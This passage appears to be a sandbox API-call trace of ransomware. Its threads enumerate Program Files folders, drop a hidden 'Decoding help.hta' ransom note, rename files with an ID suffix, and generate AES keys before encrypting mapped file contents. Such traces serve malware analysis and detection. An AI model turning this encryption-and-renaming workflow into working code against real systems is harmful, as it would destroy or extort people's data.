Shared\\ink\\ar-SA\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.993] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x2151fd30 | out: lpFindFileData=0x2151fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0058.993] FindClose (in: hFindFile=0x5e2df0 | out: hFindFile=0x5e2df0) returned 1 Thread: id = 500 os_tid = 0xc14 [0049.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*", lpFindFileData=0x216cfd30 | out: lpFindFileData=0x216cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671070 [0050.607] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.607] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x216cfd30 | out: lpFindFileData=0x216cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.607] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.607] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.607] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x216cfd30 | out: lpFindFileData=0x216cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0050.607] lstrcpyW (in: lpString1=0x10bc64c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*" [0050.607] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*") returned 63 [0050.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Decoding help.hta" [0050.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\decoding help.hta")) returned 0xffffffff [0050.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0051.594] WriteFile (in: hFile=0x4a8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x216cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x216cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.578] CloseHandle (hObject=0x4a8) returned 1 [0056.954] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.519] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.519] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*" [0058.519] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*") returned 63 [0058.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg" [0058.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg" [0058.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.520] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c [0058.520] CreateFileMappingA (hFile=0x56c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1a8 [0058.520] CryptAcquireContextA (in: phProv=0x216cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x216cfcec*=0x2aac6dd0) returned 1 [0060.230] CryptGenKey (in: hProv=0x2aac6dd0, Algid=0x6610, dwFlags=0x1, phKey=0x216cfce8 | out: phKey=0x216cfce8*=0x5a5eb0) returned 1 [0060.230] CryptExportKey (in: hKey=0x5a5eb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x216cfbe4, pdwDataLen=0x216cfce4 | out: pbData=0x216cfbe4*, pdwDataLen=0x216cfce4*=0x2c) returned 1 [0060.230] MapViewOfFile (hFileMappingObject=0x1a8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x4ce0000 Thread: id = 501 os_tid = 0xc18 [0047.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*", lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b36970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xba7b1bc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xba7b1bc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e30f0 [0047.630] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.630] FindNextFileW (in: hFindFile=0x5e30f0, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b36970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xba7b1bc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xba7b1bc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.630] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.630] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.630] FindNextFileW (in: hFindFile=0x5e30f0, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdeee800, ftCreationTime.dwHighDateTime=0x1cbf448, ftLastAccessTime.dwLowDateTime=0xba7d7d20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcdeee800, ftLastWriteTime.dwHighDateTime=0x1cbf448, nFileSizeHigh=0x0, nFileSizeLow=0x262180, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL", cAlternateFileName="")) returned 1 [0049.129] lstrcpyW (in: lpString1=0x10e36ca0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*" [0049.129] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*") returned 74 [0049.129] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\Decoding help.hta" [0049.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\decoding help.hta")) returned 0xffffffff [0049.130] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0051.464] WriteFile (in: hFile=0x334, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb90fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb90fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.020] CloseHandle (hObject=0x334) returned 1 [0055.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.155] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSOINTL.DLL") returned -1 [0058.155] lstrlenW (lpString="MSOINTL.DLL") returned 11 [0058.155] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*" [0058.155] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*") returned 74 [0058.155] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\", lpString2="MSOINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL" [0058.155] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL" [0058.155] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.156] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x744 [0058.156] CreateFileMappingA (hFile=0x744, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x440 [0058.156] CryptAcquireContextA (in: phProv=0xb90fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb90fcec*=0x3449248) returned 1 [0060.180] CryptGenKey (in: hProv=0x3449248, Algid=0x6610, dwFlags=0x1, phKey=0xb90fce8 | out: phKey=0xb90fce8*=0x5d8950) returned 1 [0060.180] CryptExportKey (in: hKey=0x5d8950, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb90fbe4, pdwDataLen=0xb90fce4 | out: pbData=0xb90fbe4*, pdwDataLen=0xb90fce4*=0x2c) returned 1 [0060.180] MapViewOfFile (hFileMappingObject=0x440, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xadd0000 [0062.599] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb90fbe4*, pdwDataLen=0xb90fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb90fbe4*, pdwDataLen=0xb90fcf8*=0x100) returned 1 [0062.601] CryptEncrypt (hKey=0x5d8950, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xadd0000, pdwDataLen=0xb90fce4*=0x100000, dwBufLen=0x100000) Thread: id = 502 os_tid = 0xc1c [0047.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*", lpFindFileData=0x21a4fd30 | out: lpFindFileData=0x21a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db2f8 [0047.101] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.101] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x21a4fd30 | out: lpFindFileData=0x21a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.789] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.790] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x21a4fd30 | out: lpFindFileData=0x21a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d78b680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe661340, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="58.0.3029.110.manifest", cAlternateFileName="580302~1.MAN")) returned 1 [0049.147] lstrcpyW (in: lpString1=0x10e3eca8, lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*" [0049.147] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*") returned 70 [0049.147] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Decoding help.hta" [0049.147] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Decoding help.hta" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\decoding help.hta")) returned 0xffffffff [0049.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Decoding help.hta" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0051.416] WriteFile (in: hFile=0x128, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x21a4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x21a4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.018] CloseHandle (hObject=0x128) returned 1 [0055.314] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.152] lstrcmpiW (lpString1="Decoding help.hta", lpString2="58.0.3029.110.manifest") returned 1 [0058.152] lstrlenW (lpString="58.0.3029.110.manifest") returned 22 [0058.152] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*" [0058.152] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*") returned 70 [0058.152] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", lpString2="58.0.3029.110.manifest" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" [0058.152] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" [0058.152] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.[ID]g9uZrLhJaygpwRm1[ID]" [0058.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ec [0058.527] CreateFileMappingA (hFile=0x5ec, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xca4 [0058.527] CryptAcquireContextA (in: phProv=0x21a4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x21a4fcec*=0x2aac6f68) returned 1 [0060.232] CryptGenKey (in: hProv=0x2aac6f68, Algid=0x6610, dwFlags=0x1, phKey=0x21a4fce8 | out: phKey=0x21a4fce8*=0x10f14540) returned 1 [0060.232] CryptExportKey (in: hKey=0x10f14540, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21a4fbe4, pdwDataLen=0x21a4fce4 | out: pbData=0x21a4fbe4*, pdwDataLen=0x21a4fce4*=0x2c) returned 1 [0060.232] MapViewOfFile (hFileMappingObject=0xca4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe0) Thread: id = 503 os_tid = 0xc20 [0047.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*", lpFindFileData=0x21c8fd30 | out: lpFindFileData=0x21c8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db978 [0047.111] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.111] FindNextFileW (in: hFindFile=0x5db978, lpFindFileData=0x21c8fd30 | out: lpFindFileData=0x21c8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.111] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.111] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.111] FindNextFileW (in: hFindFile=0x5db978, lpFindFileData=0x21c8fd30 | out: lpFindFileData=0x21c8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2be900, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5f2be900, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBE6EXT.OLB", cAlternateFileName="")) returned 1 [0047.111] 